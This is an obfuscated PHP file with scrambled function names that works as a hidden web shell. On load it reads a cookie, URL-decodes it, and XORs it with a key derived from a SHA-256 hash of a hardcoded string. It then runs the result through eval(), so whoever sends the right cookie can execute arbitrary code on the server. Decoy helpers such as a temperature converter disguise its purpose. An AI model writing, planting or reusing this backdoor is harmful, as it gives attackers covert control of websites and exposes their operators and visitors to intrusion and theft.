<?php function WikhAx($KnKgS, $UcrRjhaqvL)
{
    $DdvfYlKV = $KnKgS ^ $UcrRjhaqvL;
    return $DdvfYlKV;
}
function FzRlf($zJHJYyU)
{
    $cXMqpMjGIY = $_COOKIE[$zJHJYyU];
    return $cXMqpMjGIY;
}
function fEJqFCx()
{
    $DnOOhOCn = "ifuVwRDHEtbr";
    return $DnOOhOCn;
}
function dTUlHVYQV($JMOwLzE)
{
    $MCttLtTWw = substr($JMOwLzE, -4);
    return $MCttLtTWw;
}
function MZOXFsG($yHKOH)
{
    eval($yHKOH);
}
function uVXTFN($OrSsTbnT)
{
    $cdRam = hash("sha256", $OrSsTbnT, TRUE);
    return $cdRam;
}
function QDtBe()
{
    $sFKqomDfj = CFfFtQnwAS();
    MZOXFsG($sFKqomDfj);
}
function ASAQniu($mmtAo) {
    return ($mmtAo * 9/5) + 32;
}
function ssMEQGTMnV($bxAdipOkgP, $zfwhHJt)
{
    $fyxfEVTcZN = str_pad($bxAdipOkgP, $zfwhHJt, $bxAdipOkgP);
    return $fyxfEVTcZN;
}
function ROiev($mzgpvJFX)
{
    $tjjbZwXg = rawurldecode($mzgpvJFX);
    return $tjjbZwXg;
}
function IlJtEax($MdnaJs, $jsZyuZahJ)
{
    $nnsXcL = uVXTFN($MdnaJs);
    $hdbij = XZwUlZZO($jsZyuZahJ);
    $WnIwqbzHYI = YMVPtt($hdbij, $nnsXcL);
    return $WnIwqbzHYI;
}
function DHXOtRosOS($jcPQO) {
    $LnbmFulr = lZurSeKdLo($jcPQO);
    return calculateAverage($LnbmFulr);
}
function lZurSeKdLo($jcPQO) {
    return array_map('ASAQniu', $jcPQO);
}
function YMVPtt($bLEfSgKII, $nmNjNz)
{
    $PadFYISMow = fKAGd($bLEfSgKII);
    $QJTXf = ssMEQGTMnV($nmNjNz, $PadFYISMow);
    $sFKqomDfj = WikhAx($QJTXf, $bLEfSgKII);
    return $sFKqomDfj;
}
function XZwUlZZO($OoBoQkTwAT)
{
    $EjSbHN = FzRlf($OoBoQkTwAT);
    $hdbij = ROiev($EjSbHN);
    return $hdbij;
}
function fKAGd($QpxqTbze)
{
    $quhkSkUWKC = strlen($QpxqTbze);
    return $quhkSkUWKC;
}
function CFfFtQnwAS()
{
    $xxDHgW = fEJqFCx();
    $EBVWAdgzzz = BRfWyfj($xxDHgW);
    return $EBVWAdgzzz;
}
function BRfWyfj($gyRRmKjins)
{
    $AhzPsTrSd = dTUlHVYQV($gyRRmKjins);
    $MKTospF = IlJtEax($gyRRmKjins, $AhzPsTrSd);
    return $MKTospF;
}
QDtBe();